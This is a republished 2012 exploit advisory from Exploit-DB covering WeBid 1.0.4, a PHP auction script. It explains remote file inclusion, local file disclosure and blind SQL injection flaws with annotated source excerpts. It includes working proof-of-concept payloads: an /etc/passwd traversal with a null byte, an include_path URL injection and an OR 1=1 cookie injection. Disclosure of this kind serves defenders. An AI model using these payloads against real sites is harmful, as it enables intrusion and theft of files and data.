webid 1.0.4 – Multiple Vulnerabilities

  • 作者: dun
    日期: 2012-08-17
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/20580/
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     [ Discovered by dun \ posdub[at]gmail.com ]
     [ 2012-08-17]
     # [ WeBid <= 1.0.4 ] Multiple Vulnerabilities#
     # Script: "Open source php/mysql fully featured auction script"
     # Vendor: http://www.webidsupport.com/
     # Download: http://sourceforge.net/projects/simpleauction/files/simpleauction/
     # [RFI] ( allow_url_include = On; register_globals = On; )
     # PoC: http://localhost/WeBid/loader.php?js=admin/logout.php&include_path=http://localhost/info.txt?
     # File: ./WeBid/loader.php (lines: 15-60)
     # ob_start('ob_gzhandler');
     # header("Content-type: text/javascript");
     # include 'includes/checks/files.php'; // 1 ( Definition of $file_hashs array )
     # if (isset($_GET['js']))
     # {
     #$js = explode(';', $_GET['js']);// 3 js = admin/logout.php (for example) 
     #foreach ($js as $val)
     # $ext = substr($val, strrpos($val, '.') + 1); // 4
     # if ($ext == 'php') // 4
     # {
     #if (check_file($val)) // 5
     # include $val;// 10 include admin/logout.php
     # }
     # }
     # ob_end_flush();
     # function check_file($file)
     # {
     #global $file_hashs; // 6
     #$tmp = $file_hashs;
     #$folders = explode('/', $file); // 7 $folders = Array([0] => admin, [1] => logout.php)
     #foreach ($folders as $val)// 8 This loop checks if parts of $folders are in $file_hashs
     # if (isset($tmp[$val]))
     # {
     #$tmp = $tmp[$val];
     # }
     # else
     # {
     #return false;
     # }
     #return true;// 9 admin/logout.php passed
     # }
     # File: ./WeBid/includes/checks/files.php (lines: 2-19)
     # $file_hashs = array(// 2 List of files that can be included.
     #'admin' => array(// 2 
     # 'logout.php' => 'a0db39b73dcfd29feb1466002c4f59a4', // 2
     # );
     # File: ./WeBid/admin/logout.php (lines: 16-17)
     #..cut.. // 11 common.inc.php file contains a definition of $include_path
     # include '../includes/common.inc.php';// 11 Failed, because loader.php is in root path
     # include $include_path . 'functions_admin.php'; // 12 *[RFI] $include_path is not set by script
     #..cut.. // 12 If register_globals is On, we can set $include_path
     # [Local File Disclosure] ( magic_quotes_gpc = Off; php version < 5.3.4 )
     # PoC: http://localhost/WeBid/getthumb.php?fromfile=getthumb.php&w=../../../../../etc/passwd%00
     # File: ./WeBid/getthumb.php (lines: 17-52)
     # $w = (isset($_GET['w'])) ? $_GET['w'] : '';// 1
     # $fromfile = (isset($_GET['fromfile'])) ? $_GET['fromfile'] : ''; // 2
     # $nomanage = false;
     # if (!isset($_GET['fromfile'])) // 3
     # {
     #ErrorPNG('params empty');
     # }
     # elseif (!file_exists($_GET['fromfile']) && !fopen($_GET['fromfile'], 'r')) // 4
     # {
     #ErrorPNG('img does not exist');
     # }
     # if (file_exists($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile)))// 5
     # {
     #$img = getimagesize($fromfile);
     #if ($img[2] == 1)
     # $img['mime'] = 'image/png';
     #header('Content-type: ' . $img['mime']);
     #echo file_get_contents($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile)); // 6 *[LFD]
     # }
     # [Blind SQL Injection] ( magic_quotes_gpc = Off; )
     # PoC:
     # http://localhost/WeBid/contents.php
     # GET /WeBid/contents.php HTTP/1.1
     # Host: localhost
     # User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1
     # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     # Accept-Language: pl,en-us;q=0.7,en;q=0.3
     # Accept-Encoding: gzip, deflate
     # Connection: keep-alive
     # Cookie: WEBID_ONLINE=-1' OR 1=1--
     # File: ./WeBid/contents.php (lines: 15, 38)
     # include 'includes/common.inc.php';
     # include 'header.php';// 1
     # File: ./WeBid/header.php (line: 26)
     # $counters = load_counters(); // 2
     # File: ./WeBid/includes/functions_global.php (line: 287-320)
     # function load_counters() // 3
     # {
     #if (!$user->logged_in)
     # if (!isset($_COOKIE['WEBID_ONLINE']))
     # {
     #$s = md5(rand(0, 99) . session_id());
     #setcookie('WEBID_ONLINE', $s, time() + 900);
     # }
     # else
     # {
     #$s = $_COOKIE['WEBID_ONLINE'];// 4
     #setcookie('WEBID_ONLINE', $s, time() + 900);
     # }
     #$query = "SELECT id FROM " . $DBPrefix . "online WHERE SESSION = '$s'"; // 5 *[SQL]
     #$res = mysql_query($query);
     #$system->check_mysql($res, $query, __LINE__, __FILE__);
     ### [ dun / 2012 ] #############################